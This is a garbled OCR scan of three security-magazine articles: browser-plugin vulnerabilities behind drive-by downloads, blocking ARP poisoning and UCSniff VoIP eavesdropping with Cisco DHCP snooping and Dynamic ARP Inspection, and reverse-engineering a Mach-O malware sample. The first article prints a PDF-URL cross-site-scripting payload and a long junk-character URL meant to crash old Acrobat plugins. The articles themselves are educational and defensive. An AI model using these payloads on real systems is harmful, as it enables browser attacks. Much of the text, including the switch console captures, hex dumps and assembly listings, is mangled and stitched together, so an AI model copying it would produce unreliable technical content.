this vulnerability to crash a victim's browser and run 
arbitrary code on the victim's computer. It was also 
confirmed by Mozilla that these vulnerabilities will lead 
to Drive-By-Download attacks and recently these issues 
were patched. Similarly CVE-2008-4844 discusses 
a vulnerability in Internet Explorer which could allow 
remote code execution if a user views a specially crafted 



Listing 1. Example Action Script Code 

Socket SandboxError 

{ 

import flash, display. Sprite; 
import flash . net . Socket ; 

public class SocketSandboxError extends Sprite 

private var _connection : Socket; 
public function SocketSandboxError ( ) 

{ 

_connection = new Socket (); 
_connection . connect ( "localhost" , 8080 ) ; 

} 




Error #2044: Unhandled SecurityErrorEvent : 

. text=Error #2048: Security 
sandbox violation : file: 
///C | /Stuff '/FlashTest/src/ 
SocketSandboxError . swf cannot 
load data from localhost : 8080 . 

at SocketSandboxError$iinit ( ) 
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Web page. Microsoft also have acknowlodged the issue 
and has released Security Bulletin and Update MS08- 
078 to address the same. 

Drive-By-Download attacks doesn't only happen 
due to Web browser vulnerabilities. Another major 
area of concern are the various browser plugins and 
components that are installed in the browser to enrich 
the browsing activities. Vulnerable browser plugins and 
components can get exploited by malicious websites and 
result in Drive-By-Download attacks. Secunia Advisory 
SA35948 (released on 23rd July 2009), describes the 
below mentioned vulnerabilities in the Adobe Flash 
Player browser plugin also which can be used by an 
attacker to launch Drive-By-Download attacks. 

• An unspecified error can be exploited to gain 
escalated privileges. 

• A use-after-free error when parsing Shockwave 
Flash files may cause references to remain pointing 
to a deleted object, which can be exploited to 
corrupt memory 

• An unspecified error may lead to a null pointer 
vulnerability 

• An unspecified error may lead to a stack overflow 
vulnerability 

• An error in the parsing of URLs can be exploited to 
cause a heap-based buffer overflow. 

• An integer overflow error in the AVM2 abcFile 
parser when handling the intrf_count value of the 
instancejnfo structure can be exploited to corrupt 
memory and execute arbitrary code. 

Security Firm Trusteer has reported that 84 percent of 
the 2.5 million systems which they had monitored, as 
part of the company's Rapport Security Service, were 



having vulnerable versions of Adobe Reader pluggin and 
arround 80 percent had a vulnerable version of Adobe 
Flash Player installed. Till a fix comes these vulnerable 
versions will get extensively exploited by Malware authors 
by inserting or injecting exploit codes in those file types 
which are intended to run on victim's Web browser. Lets 
now see some ways by which these browser plugins and 
components can be used as attack vectors. 

Adobe Acrobat PDF Reader 

Once we install Adobe Acrobat PDF Reader in the 
system, it also installs a Browser Helper Object (BHO) 
that integrates itself with the browser to ensure that 
PDF documents can be parsed and opened in the 
browser window itself. This is definitely an enrichment 
of the overall browsing experience because we don't 
have to bother any more to manually open these PDF 
document with a PDF reader. Instead, the BHO installed 
with the browser is doing this activity by automatically 
displaying the PDF document in the browser window 
itself. However, there are certain interesting things that 
are also possible. Say for example, you want to Zoom 
a PDF document, you can do so directly from the web 
url itself (refer to the link): http://www.malwareinfo.org/ 
files/HowVirusLoads.pdf#zoom=1 20 (see Figure 14) 

Similarly you can navigate to any page of the PDF: 
http://www.malwareinfo.org/files/HowVirusLoads.pdf 
#page=4 (see Figure 15) 

This way it has become easier for authors to target 
certain sections and pages so that when the link opens, 
it can pinpoint the exact information that the author 
is trying to focus, and this is all possible from the 
URL itself. However, with certain vulnerable versions 
of Adobe PDF Reader its also possible for Malware 
authors to exploit or carry out malicious activities. For 
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Figure 14. Control PDF Display Zoom Through URL 
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Figure 15. Control PDF Display Page Through URL 
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example Adobe PDF Reader versions lesser than 7.0.8 
will throw a javascript popup (Reflective Cross Site 
Scripting (XSS) Vulnerability) when the below URL is 
browsed: http://www.malwareinfo.org/files/HowVirusLo 
ads.pdf#zoom=ja vascript:alert( 0) . 

Furthermore, if we pass an unexpectedly long URL with 
junk charecters, then it might lead to a Denial of Service 
(DoS) to the users browser because of a Buffer Overflow 
injection and would result in crashing the browser 
unexpectedly. Please refer to a sample link below: 

http://www.malwareinfo.org/files/HowVirusLoads.pdf 
#AAA3A%26%23x61%26%23x6C%26%23x65%26%2 
3x72%26%23x74%26%23x28AAAA%26%230000106 
%26%230000097%26%230000118%26%2300000%2 
30000041 AA%24%24%24%24%24%24%24%24%24 
%24%2444%5E%5E%5E%24%24***%5E%24%24%2 
4%24%24%24%24%24%23%23%23%23%23%23%2 
3@@@@@@@@%23%23%23%23 

A specially crafted URL might also lead to a more 
severe threat of arbitrary code execution resulting in 
Drive-By-Download attacks. If we are using an updated 
version of the plugin, then a malicious URL will not 
result into arbitrary code execution, rather, the plugin 

On the 'Net 

Microsoft Security Intelligence Report volume 6 (July - December 2008) - http://www.microsoft.com/downloads/details.aspx? 
FamilylD=aa6e0660-dc24-4930-affd-e33572ccb91f&displaylang=en 

Web Attacks: How Hackers Create and Spread Malware - https://www.techwebonlineevents.com/ars/eventregistration.do7mo- 
de=eventreg&F=W017l8&K=4ON&cid=well2_webc_ 

Kaspersky Security Bulletin (Statistics 2008) - http://www.viruslist.com/en/downloads/vlpdfs/kaspersky_security_bulletin_part_ 
2_statistics_en.pdf 

Kaspersky Monthly Malware Statistics - http://www.viruslist.com/en/analysis?pubid=204792071 
Security Response Blog - http://www.symantec.com/connect/symantec-blogs/security-response 
Google Online Security Blog - http://googleonlinesecurity.blogspot.com 
Google Research - http://research.google.com/archive/provos-2008a.pdf 

• Arbor Network Security - http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel 

Commtouch Q2 2009 Internet Threats Trend Report - http://blog.commtouch.com/cafe/data-and-research/q2-internet-threats- 
trend-report-released 

Panda Security Research - http://research.pandasecurity.com/archive/tags/stats/default.aspx 
F-Secure Web Blog - http://www.f-secure.com/weblog/archives/00001427.html 

ScanSafe Annual Threat Report - http://www.scansafe.com/__data/assets/pdf_file/3005/5can5afe_-_Annual_Global_Threat_ 
Report2.pdf 

Netcraft October 2008 Web Server Survey - http://news.netcraft.com/archives/2008/10/29/october_2008_web_server_su- 
rvey.html 

Internet Usage and World Population Statistics 2009 - http://www.internetworldstats.com/stats.htm 
OPA Internet Activity Index - http://www.online-publishers.org/newsletter.php?newsld=556&newsType=pr 
Neil MacDonald - Gartner Blog Network - http://blogs.gartner.com/neil_macdonald 

IBM ISS X-Force Lab Malware Report - http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-re- 
port.pdf 

Cyveillance Report - http://www.cyveillance.com/web/docs/WP_Cyberlntel_Hl_2009.pdf 

• Wikipedia (Rogue security software) - http://en.wikipedia.org/wiki/Rogue_security_software 

Google Online Security Blog - http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html 
Common Vulnerabilities and Exposures (CVE) - http://www.cve.mitre.org/index.html 
Secunia Advisory - http://secunia.com/advisories 

i Defense Secu rity Advisory - http://labs.idefense.com/intelligence/vulnerabilities 
Web Browser Plugins Vulnerabilities - d0ubl3_h3lix 

• Trusteer's Rapport Security Service - http://www.trusteer.com/solution 

FireEye Malware Intelligence Labs - http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html 

Umesh Wanve (Zscalar Security Researcher) - http://research.zscaler.com/2009/09/in-wild-flash-exploit-analysis-part-l.html 

Brian Krebs (Washington Post) - http://blog.washingtonpost.com/securityfix/2008/04/hundreds_of_thousands_of_micro_l.html 



f \ The URL associated with this PDF is malformed and may not display properly. 
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Figure 16. Acrobat Malformed URL Notification 

will notify you that the URL associated with the PDF is 
malformed (see Figure 16). 

Adobe has acknowledged the above mentioned 
vulnerability and has provided an update to resolve it in 
Adobe Reader and Acrobat. They released a Security 
Buletin APSB07-01 catering to the above mentioned 
Cross Site Scripting (XSS) vulnerability in versions 
7.0.8 and earlier of Adobe Reader and Acrobat. 
iDefense Security Advisory with CVE number CVE- 
2009-2991 (released on 13th October 2009) describes 
a similar vulnerability in Acrobat and Reader Firefox 
plugin which could also allow an attacker to execute 
arbitrary code. iDefense has confirmed the existence of 
this vulnerability in Acrobat and Reader versions 8.1.3, 
8.1 .4, 8.1 .5, and 8.1 .6. Previous versions are also likely 
to be affected by this vulnerability. 
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Adobe Flash Player 

We had pointed out earlier that, as per the statistics 
presented by Security Firm Trusteer, arround 80 
percent of users have a vulnerable version of Adobe 
Flash Player installed. Flash is supported by arround 
850 million internet connected desktops. Now the point 
is, with so much of Flash related contents arround in 
the internet, for example in video tube sites, social 
networking sites, advertisements in sites, this is 
a pottentially a very dangerous Malware propagation 
channel. One Malware created to infect a computer 
by exploiting any of these Flash vulnerabilities has 
a scope of infecting all these 850 million systems. In 
2009 itself, 29 vulnerabilities have been reported. The 
below link will give you an insight of the huge number of 
Flash related critical vulnerabilities reported (166 CVE 
entries) in between 2001 to 2009. Refer to the link: http: 
//eve. mitre. org/cgi-bin/cvekey.cgi?keyword=Flash. 

On 22nd July 2009 Adobe has released the Security 
Advisory APSA09-03, having a CVE number CVE- 
2009-1862, for a critical vulnerability that exists in 
the current versions of Flash Player (v1 0.0.22.87 and 
earlier) for Windows, Macintosh, Linux and Solaris OS. 
Of all the past and existing vulnerabilities identified, this 
is perhaps the most recent threat (as of now while this 
article is being written) that is rumored to be causing 
wide spread attacks. The shocking part of the story is, 
48 percent, which is almost half of all these reported 
Flash vulnerabilities reported till date have been 
exploited to achieve arbitrary code execution. Although 
Adobe has recommended that all users of Adobe Flash 
Player 10.0.22.87 and earlier versions upgrade to 
the newest version 10.0.32.18 but going back to the 
findings of Trusteer, it is believed that still now this is 
a major threat that looms large in the wild. These kind 
of Flash exploits have been known to use the heap 
spraying technique, implemented using Javascript, 
which could result in arbitrary code execution. Although 
heap sprays have been used in exploits since 2001 but 
since 2005 a more widespread use of this technique is 
seen in exploits targeted for Web Malwares. 

Sun Java Plugin 

Similar to the above mentioned Adobe Flash, Adobe 
Acrobat Reader vulnerabilities, it also was reported 
that vulnerabilities in Sun Java Plug-in etc were making 
users susceptible to serious attacks. Secunia Advisory 
SA34451 (released on 26th March 2009), describes the 
below mentioned vulnerabilities in the Sun Java Plug-in 
which can be used by an attacker to execute arbitrary 

Note 

A lot of information has also been compiled from various 
other freely available sources in the internet. Resemblan- 
ce of any other article with this article is purely co-inciden- 
tal and unintentional. 



code, read/write/execute local files or even access local 
system ports. 

• An error in the Java Plug-in when deserializing 
applets can be exploited to e.g. read, write, or 
execute local files. 

• The Java Plug-in allows JavaScript code loaded 
from the local system to connect to arbitrary local 
ports. This can be exploited in combination with 
cross-site scripting attacks to access normally 
restricted local ports. 

• An integer overflow error in J RE when processing 
PNG splash screen images can be exploited by an 
untrusted Java Web Start application to cause a buffer 
overflow and potentially execute arbitrary code. 

• An error in JRE when processing GIF splash 
screen images can be exploited by an untrusted 
Java Web Start application to cause a buffer 
overflow and potentially execute arbitrary code. 

• An error in JRE when processing GIF images can 
be exploited by an untrusted applet or an untrusted 
Java Web Start application to cause a buffer 
overflow and potentially execute arbitrary code. 

• A signedness error in JRE when processing Typel 
fonts can be exploited to cause corrupt heap 
memory and potentially execute arbitrary code. 

The biggest challenge associated with these vulnerable 
browser plugins and components is that the Web 
browser software itself may not be vulnerable, instead 
these plugins are, and until the vendors of these plugins 
or components fix them, the endusers will remain 
vulnerable. So more the internet users that access the 
various Websites and Web related technologies, the 
more target audience these Malwares get. So, logically 
any Malware that is created to infect a computer by 
exploiting any of these vulnerabilities has a scope of 
infecting all the systems that has the said vulnerable 
plugin/component installed. 

In this section we saw the techniques of infection 
related to Web Malwares. We had also seen some 
of the tricks or flaws which are used by the Malware 
authors and how vulnerable browsers, vulnerable 
browser plugins or components or even vulnerable 
Web applications, unknowingly, aids to keep the threat 
of Web Malware alive. In the third and the concluding 
section Web Malwares (Part 3), we will focus on some 
of the interesting methodologies which are commonly 
used in Web Malwares. 
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ATTACK 

Defeating Layer-2 

attacks in VoIP 

ARP Poisoning and other Layer 2 attacks are present 
since many decades now and one may think that they are 
absolute. However, we still see them quite often on the 
network. The biggest advantage is easy access to sensitive 
information like passwords, credit card details, phone 
conversations etc 



What you will learn... What you should know... 

• How to securely implement ARP Poisoning preventive • Understanding of ARP Poisoning attacks, 
measures in your network • Familiarity with Cisco command line interface. 



Many tools like Ettercap, Cain and Able, DSniff, 
trapper etc. were written to carry out ARP 
Poisoning attacks. Ettercap and Cain & 
Able are the most popular ones. Since, Ettercap is 
open source and flexible, many new small tools have 
evolved targeting specific protocols. One of them is 
UCSniff. 

In this article, we will see how to block UCSniff and 
thereby all other ARP-Poisoning tools. 

VoIP is picking up in almost all scales of industries. 
Due its cost effective and feature rich solution 
many industries have already adopted it as their 
primary communication system. However, if one 
asks VoIP vendors and adopters about their biggest 
VoIP security risk, the obvious answer would be 
eavesdropping. It's a breach in confidentiality of 
the communication and can cause huge business 
impact. 

Unified Communication sniffer (UCSniff) is a next 
generation VoIP sniffing tool from VIPER Lab. It can 
smoothly detect and sniff ongoing audio/video call 
sessions between the IP phones and store the media in 
.wav, .aw files. It can also capture Voice mail pin codes 
and alter phone settings. 

Views expressed in this article are personal to the author 
and do not necessarily reflect the opinions of other experts 
and Microsoft Corporation. 



Considering eavesdropping as one of the biggest 
threats to VoIP networks, UCSniff proves to be an 
extremely dangerous tool which an attacker wishes 
to have in his arsenal. UCSniff supports automatic 
recording and saves conversations using G.722, 
G.729, G.726, G.723 codec. Its latest version can 
intercept H.264 video traffic too. Though wireshark 
can also decode, store VoIP payload and create audio 
file out of it, it's a tedious process if multiple calls get 
involved in the packet capture. UCSniff makes all this 
very simple. 

These are some of the implications caused by tools 
like UCSniff. But how do we prevent our network from 
it and mitigate the risk? This is what the article is all 
about... Defeating UCSniff ;) The security measures 
explained here can also be used to defeat similar 
tools like Ettercap, VideoJak, Cain and Able, trapper 
etc. 

Before we delve into mitigation techniques, I would 
like to brief about UCSniff and its architecture. UCSniff 
is nothing but a strip down version of Ettercap with 
VoIP protocol dissectors. Ettercap is a well-known 
multipurpose sniffer and logging utility for switched 
LAN's. It is also used to implement MITM attacks in 
the networked environment. Ettercap has different 
graphical interfaces viz Text, Ncurses and GTK. 
UCSniff has removed Ncurses and GTK display 
interfaces along with most of the protocol dissectors 
and plugins. 
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So the key essence of UCSniff is ARP-Poisoning. It 
does the Man-ln-The-Middle (MITM) attack using ARP 
Poisoning techniques of Ettercap and sniff/dumps the 
VoIP Calls. 

So, in order to defeat UCSniff, network admin needs 
to prevent his network from ARP-Poisoning attacks. 
I am going to show you a few techniques that can be 
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Figure 2. UCSniff in action 


Chackraview# configure terminal 








Enter configuration commands, on 


5 per line. 


End 


with CWTL/Z. 


Chackraview ( config) #ip dhep snoo 


Ding 






Chackraview ( config) #ip dhep snoo 


Ding vlan 2 0 






Chackraview ( config) finterf ace fa 
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Chackraview ( config) finterf ace fa 


stethernet 0/ 
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Chackraview ( config-if) #ip dhep s 
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Chackraview ( config-if) fend 
Chackraview#§ 








Figure 3. Configuring DHCP Snooping 


ChockraviewiHshow ip dhep snooping binding 
M&cAddress IpAddress L«ase<sec) 






interface 


0OlOBj82:lBlAOl7F 172*16.20*2 96360 
00:OB:82:1B:AO:7B 172*16*20*3 86357 
Total number of bindings: 2 


dhep- snooping 
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20 
20 


FastEtnornotn/e 
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Chac}craview*| 









Figure 4. DHCP snooping bindings 



Chackraviewtt 

2d04h: KSySz^C QNFIG_I: Conf i gucerLfrgm console by ytyO (172.16.20.5) 

2d04h: XSW_DflI-4-PflCKET_RflTE_EKCEED'ED': 16 packets received in 184 milliseconds o 

n Fa0/37^~- 

2d04h: %PH-4-ERR_DISRBLE : arp-inspection error detected on Fa0/3, putting Fa0/3 | 
in eri — disable state 
2d04h: %LINEPR0T0-5-UPD0WN: 

2d04h : clcff 3-UPMWNT3:nterf ace FastEthernet0/3 , 



Line protocol on Interface FastEthernet0/3 , changed 
changed state to down 



Figure 5. DHCP Snooping Logs 



used to defeat UCSniff and similar tools based on ARP 
Poisoning. 

I have a small VoIP Lab consisting of Cisco Catalyst 
3560 series switch along with 4 VoIP phones. Two of 
them have video capabilities. All phones are registered 
with SIPXecs server - an open source IP PBX. The 
topology can be seen in Figure 1 . 

Let's run the UCSniff without any ARP 
protection and see the impact on audio/video 
conversations. 

Figure 2 shows UCSniff eavesdropping 
VoIP Audio/Video call using its Live Monitor 
feature; thereby dumping the audio/video in 
respective .wavar\6 .aw files. 

Figure 2 also demonstrates number of 
hosts enumerated by UCSniff. Keep a note 
of this number, we will need it afterwards. We 
just saw how easily UCSniff can spy on our 
calls. 

Before we do any security configurations 
on our Cisco 3560 switch, let me brief you 
about the security features which we will be 
using to prevent ARP attacks. 

• DHCP Snooping 

• Dynamic ARP Inspection (DAI) 



DHCP Snooping 

DHCP snooping is a DHCP security feature 
that provides security by filtering untrusted 
DHCP messages and by building and 
maintaining a DHCP snooping binding 
table. 

An untrusted message is one that is 
received from external network or outside 
the network or firewall and can cause traffic 
attacks within your network. DHCP snooping 
acts like a firewall between untrusted hosts 
and DHCP servers. 

DHCP snooping classifies interfaces 
as either trusted or untrusted. DHCP 
messages received on trusted interfaces 
will be permitted to pass through the Cisco 
switch, but DHCP messages received 
on untrusted interface in a Cisco Switch 
results in putting the interface into error 
disable state. 

Let's enable DHCP Snooping security 
feature for VLAN 20 on my lab switch as 
shown in figure 3. 

Figure 4 shows the DHCP Snooping 
binding database having 2 entries of my 
Grandstream phones. 

The DHCP snooping binding table contains 
the MAC address, IP address, lease time, 
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binding type, VLAN number, and interface information 
that corresponds to the local untrusted interfaces of 
a switch; does not contain information regarding hosts 
interconnected with a trusted interface. 

Dynamic ARP Inspection (DAI) 

DAI is a security feature that validates ARP packets 
in a network. DAI intercepts, logs, and discards ARP 
packets with invalid IP-to-MAC address bindings. This 
capability protects the network from some Man-in- 
the-middle attacks. DAI ensures that only valid ARP 
requests and responses are relayed. 

When DAI is enabled, switch performs these 
activities: 

• Intercepts all ARP requests and responses on 
untrusted ports 
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Figure 6. Enabling Dynamic ARP Inspection 
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Figure 7. UCSniff defeated successfully 
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Figure 8. Switch port status after successful block 



2d05h: %SW_DflI-4- 
0c.29c2. 8152/0.0. 
2d05h: %SW_DflI-4- 
0c. 29c2. 8152/0.0. 
2d05h: %SW_DRI-4- 
0c. 29c2. 8152/0.0. 
2d05h: KSW_DRI-4- 
0c. 29c2. 8152/169. 

3]) r 

2d05h: ISyflI-4- 
0c.29c2T8152/±69-, 
3])_ 



DHCP_SN00PING_DENV: 1 Invalid RRPs (Req) on Fa0/4, vlan 20. ([00 
0.0/0000.0000.0000/169.254.6.67/05:10:17 UTC Wed Mar 3 1993]) 
DHCP_SN00PING_DENV: 1 Invalid RRPs (Req) on Fa0/4, vlan 20. ([00 
0.0/0000.0000.0000/169.254.6.67/05:10:18 UTC Wed Mar 3 1993]) 
DHCP_SN00PING_DENV: 1 Invalid RRPs (Req) on Fa0/4, vlan 20. ([00 
0.0/0000.0000.0000/169.254.6.67/05:10:20 UTC Wed Mar 3 1993]) 
DHCP_SN00PING_DENY: 1 Invalid RRPs (Req) on Fa0/4, vlan 20. ([00 
254.6.67/0000.0000.0000/169.254.6.67/05:10:22 UTC Wed Mar 3 199 



DHCP_SN00PING_DEM 



£>1 Invalid RRPs (Req) on Fa0/4, vlan 20. ([00 
.0000/169.254.6.67/05:10:24 UTC Wed Mar 3 199 



Figure 9. Logs after successful ARP poison block 



• Verifies that each of these intercepted packets has 
a valid IP-to-MAC address binding before updating 
the local ARP cache or before forwarding the 
packet to the appropriate destination 

• Drops invalid ARP packets 

DAI determines the validity of an ARP packet based 
on valid IP-to-MAC address bindings stored in 
the DHCP snooping binding database. If the ARP 
packet is received on a trusted Interface, the switch 
forwards the packet without any checks. On untrusted 
interfaces, the switch forwards the packet only if it is 
valid. 

DAI associates a trust state with each interface 
on the switch. Packets arriving on trusted interfaces 
bypass all DAI validation checks, and those arriving 
on untrusted interfaces undergo the DAI validation 
process. 

Following screenshots show the Dynamic 
ARP Inspection configuration on my lab 
Switch. 

In a typical network configuration, you 
configure all switch ports connected to host 
ports as untrusted and configure all switch 
ports connected to switches as trusted. With 
this configuration, all ARP packets entering 
the network from a given switch bypass the 
security check. By default all the switch ports 
are configured as untrusted. 

With these security measures in place, let's 
run UCSniff again and see the result. 

I have plugged in my laptop on switch port 
FaO/3 with IP address 172.16.20.7 

Adjacent screenshot shows UCSniff was 
able to detect only one host which is the 
gateway. Why this has happened? 
Let's have a look into the switch console. 

Note a line %SW_DAI-4-PACKET_RATE_EXCEEDED: 

from the above console log screenshot. It 
also shows ARP -inspection error detected 
on interface FaO/3 and its link state has 
changed to down and my laptop is kicked 
out of the network. This has happened 
because of the rate limiting module of DAI 
feature. 



Rate Limiting of ARP Packets 

The switch performs DAI validation checks, 
which rate limits incoming ARP packets 
to prevent a Denial-of-Service attack. By 
default, the rate for untrusted interfaces is 15 
packets per second (pps). 

Trusted interfaces are not rate limited. 
You can change this setting by using the ip 
ARP inspection limit interface configuration 
command. 
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Figure 1 0. Interface Recovery after successful block 

With the rate of incoming, ARP packets exceeds the 
configured limit, the switch places the port in the error- 
disabled state. The port remains in that state until you 
intervene. 

I plugged in my laptop in Fa04, Fa05 and ran UCSniff 
and got similar results. Following screen shot shows 
the status of all the switch interfaces from where I ran 
UCSniff. 

Now the obvious question that appears, is that rate 
limiting module will defeat UCSniff but what about the 
tools which perform ARP poisoning slowly and do not 
scan for target hosts? 

Let's try this scenario and poison single hosts by 
sending fake ARP request/reply packets. As ARP 
Poisoning single host needs only 2 spoof ARP 
packets; rate limiting module will not trigger and we 
should be able to get around with the DAI feature 
right? But it failed again :) how? Let's check the switch 
console in following screenshots. 

The line %sw_dai-4-dhcp_snooping_deny from the 
screenshot explains everything. When we send ARP 
reply with spoofed MAC address, switch checks the 
ARP packet with the DHCP Snooping binding table 
and drops the packet as MAC/IP does not match with 
the table entries; defeating the ARP attack. 

You can use the errdisable recovery global 
configuration command to enable error disable 
recovery so that ports automatically emerge from 
this state after a specified timeout period. Adjacent 
screenshots shows the way you can use the errdisable 
recovery cause global configuration command to 

References 

Dynamic ARP Inspection 
DHCP Snooping 

h ttp://ARPon.sourceforge. net/documen ta tion. h tml 
• http://ARPstar.sf.net 



Prerequisites 

Understanding of ARP Poisoning attacks. 
Familiarity with Cisco command line interface. 



enable error-disabled ports after a specified 
timeout period. 

Other Prevention Techniques 

Though ARP attacks are dangerous and can 
cause dire results; Dynamic ARP Inspection 
can easily defeat such attacks and ensure 
that our mission-critical communications and 
systems are protected. 

SOHO administrators can also make 
use of open source tools like ARPOn 
(http://ARPon.sourceforge.net) to protect 
their systems from ARP poisoning attack. 

ARPON (ARP handler inspectiON) is a portable 
handler daemon with some nice tools to handle all 
ARP aspects. It has lots of features and it makes ARP 
a bit safer. This is possible using two kinds of Anti ARP 
Poisoning techniques; the first is based on SARPI 
or Static ARP Inspection, the second on DARPI or 
Dynamic ARP Inspection approach. 

ARPOn is not ported on embedded devices like 
routers and phones; in fact, it's more of a host based 
solution. 

Read more about features of ARPOn here (http:// 
ARPon.sourceforge.net/documentation.html). 

Another Linux Kernel Module ARP* (ARP Star) 
(http://ARPstar.sf.net) can also be used on your 
Linux gateway to detect and prevent ARP poisoning 
attacks. 

This project has been coded in C and is available 
as a module for the 2.6 Linux kernel series. The only 
libraries needed are included in the Linux kernel. It has 
also been ported to the Linksys WRT54G 

I have not played with these tools yet, but, down 
the line will surely write on both of them. Till then stay 
Safe :) 
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Armoring Mai ware: 

Hiding Data within Data 

We are receiving malware daily via hundreds of facets that 
the Internet enables with various services; most common 
are via e-mail and web surfing. 



What you will learn... What you should know... 

• You will learn how to armor your malware against simple • Basic understanding of Assembly/C language, debugging and 
attacks to build further. reverse engineering. 



At any one time you can be sitting idly on the 'net 
when you are presented with something that 
could be malicious either overtly or covertly. 
We'll play through the scenario of where you've 
discovered a binary on your network and unsure of it's 
purpose... and then reveal how it was done. 

Example Scenario Malware Dissection 
Workflow 

At this point let's agree that we've de-obfuscated the 
presented malware binary by unpacking it and ready 
to look for any obvious information that will help us 



determine it's contents and overall purpose. Also 
assume that it will be sandboxed in a virtual machine so 
that it does not cause communication or damage to our 
network and test machine. 

For all intents an purposes we've rename the binary 
blob to the filename secreturl as we've noticed using 
Wireshark (network sniffer) that it is trying to phone 
home to a URL that is not known to be on it's list for 
this variant. We would like to see how it is being hidden 

H O rs Terminal - bash — 42x5 



> f i Le secreturl 

secreturl: Mach-0 64-bit executable x86_64 



Notes 

All source code created and tested on: 

Mac OS X 10.6.4 [10F569], 

(GCC) 4.2.1 (Apple Inc. build 5646) (dot 1) 

GNU gdb 6.3.50-20050815 (Apple version gdb-1346) 



Te rmi rial — bash — 42x14 



•tring i secrstui i 
[ A :]://&99 [ A .].&99 [ A .].&9' 

p ://www .goog le .com 

p: //www. yahoo. com 

p: //www. apple. com 

p : //www . m i crosof t . com 

p ://www .b lackhat .com 

p ://www .def con .org 

p ://www . israe Itorres .org 

p : //www . tw i tter . org 

p : //www .1234567890 .examp 1 1 



Figure 2. Running secreturl binary through file 
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Figure 1 . Running secreturl binary through strings 



Figure 3. Running secreturl binary through hexdump 
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tp: //www. 12345678 
90 .examp le 



0 



Oi^ot: 0 Selection: 0 



stack_chk_guar 

d. Qr . .@dyld_stub_ 

binder .r r . .@_ 

__sprintf.;chk. . .r 

.@ stack_chk_f 

ai L . . .r(.i3__ JsTrc1 
[pyl_chk . . .rB.@_ex i 
t. . .rS^ Lsscanfl . 

._. .start . 

V. ._. }par se_ur L . [ 
main. "NXArg.eerwi 
ron.w. .mh_execute 
.header .R_prognam 

e. l 

c.mv.r . . . 



Line_strcpy_chk. 
stub helpers._pva 
rs._NXArgc._NXArg 

v. progname. m 

h_execute_header . 
.environ. _main._p 

arse_ur I .start. 

_sprintf_chk. s 

tack_chk_f ai L . 

stack_chk_guard._ 

strcpy_chk._exi 

t._sscanf .dy Ld_st 
ub_binder 



pffset: 0 Selection: 0 A Offset: 0 Selection 



Figure 4. Examining secreturl binary in OxED hex editor 

to discover future variants using the same or similar 
technique. 

We fire up our Mac OS X 10.6.4 Virtual Machine and 
begin our reversing workflow with putting secreturl 
through the strings program (Figure 1). 

We are presented with 11 easy to read strings of 
which 9 are URLs we are familiar with; and at this point 
appear to be quite benign. We also notice the remaining 
two strings look somewhat familiar but non-threatening 
at this time. 

Next we use the file program to determine a known 
filetype (Figure 2) and come to find it is being reported 
as Mach-0 64-bit executable x86_64 - since we are 
running in a Mac OSX Virtual Machine we will be able to 
execute this file if need be but we still have a few tricks 
up or sleeves. 

We run hexdump to see what kind of calls the binary 
is calling and to confirm anything that strings may have 
missed in it's string parsing: hexdump -C secreturl 
(Figure 3) another great tool to view files via hex is 
OxED so we dropped secreturl into OxED and scroll 
through the hex we confirm the strings (Figure 4) and 



■: gJL "■ d\ i^-.-^t'l-i :•■'.?.[ 

Dump of asse mblex cod 

0800088100600794 <m 

0X0009000100000795 -dlt 

0X0000000100000798 <m 

0x8808888i 88080799 «*>s 

0X00000001000007Q0 -dlt 

:.i »j!.:i»j!Jj.^j!.::i <m 
0 •»> ■.\::<>\ i\i 7na 

0x00000001000007ae -din 

0X00000001000007b0 <m 

8x8880888188800?b7 jb 

0X00000001000007bb -dll 

0X00000001000007C2 <m 

0X00000001000007C6 -dlt 

0X00000001000007CC <ftt 

0X00000001000007C:f -dll 

0X00000001000007d6 -dlt 

0X00000001000007da <m 

0 -. 0 €s 6 :' j if: 8 :3 J. ^ e 6 u : = ?•?}. ?.\ 

0X0000000100000765 <m 

0X00000001000007SC <St 

0X00000001000007f0 -dll 
0-:t!liy:Jt'!tiUJLt'!tiW:J ! .iVrL-. 

0X00000001000007f9 <m 

0X0000000100000800 -dll 

0X0000000100000803 <m 

0X000000010000080a <ftt 

I J -'I J- i- 1 J- "i dii 
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&rsp,&rbp 
Krbx 

$0xl3e8,S&-sp 
0x869(?irip),?irax 
(Krax),?irdx 
J&-dx,-0xl8(5&-bp) 
&edx,&edx 
0x65c(&rip),&rax 
S&-ax,-0x70(S£rbp) 
0x659 Qfr ip),S£r ax 
2£rax,-0x68(&rbp) 
0x657 (?irip),!!feax 
ffeax,-0x60(!a-bp) 
0x651 (&rip),?feax 
23ax,-0x5c(&rbp) 
0x648(^ip),!a-ax 
&rax,-0x30(&rbp) 
0x645 (&rip), Sir ax 
J&-ax,-0x28($£rbp) 
0x643(&rip),?feax 
%eax,-0x20(2irbp) 
. 0x63d(J&-ip),S4eax 
ftaL,-0xlc(&rbp) 
0x634 (&rip),&rax 
&rax,-0x50(?&-bp) 
0x631 (&rip),&r ax 




BOO 



stringsl.txt 



0X0000000100000700 
0X00000001000007b0 
0X00000001000007bb 
0X00000001000007C6 
0X00000001000007cf 
0X00000001000007da 
0X0000000100000765 
0X00000001000007f0 
0X00000001000007f9 
0X0000000100000803 
0X0000000100000806 
0X0000000100000819 
0X0000000100000822 
0X000000010000082C 
0X000000010000083a 
0X0000000100000848 
0X0000000100000856 
0X0000000100000863 
0X0000000100000871 
0X000000010000087f 
0X000000010000088CJ 
0X000000010000089b 
0X00000001000008a9 
0X00000001000008b2 
0X00000001000008bd 
0X00000001000008cb 
0X00000001000008d9 
0X0000000100000867 
0X00000001000008f3 
0X0000000100000901 
0X000000010000090f 
0X000000010000091b 
0X0000000100000929 
0X0000000100000936 
0X0000000100000944 
0X0000000100000952 
0X0000000100000960 
0X000000010000096C 
0X0000000100000d2b 
0X0000000100000d46 



<main+12>: 


mov 


0x869(SSrip),SSrax 


# 


0X100001010 


<main+28>: 


mov 


0x65c(^ip),?Srax 




0X100000613 


-diiain+39>: 


mov 


0x659 (&rip),ftrax 


# 


0Xl000006lb 


-diiain+50>: 


mov 


0x657(ftrip),Sfeax 


# 


0X100000623 


<main+59>: 


movzw L 


0x651 (ftrip),fteax 


# 


0X100000627 


<main+70>: 


mov 


0x648 (&rip),&rax 


# 


0X100000629 


<main+81>: 


mov 


0x645 jWip),ftrax 


# 


0X100000631 


<main+92>: 


mov 


0x643(&rip) ! ?fecix 


# 


0X100000639 


<main+101>: 


movzb L 


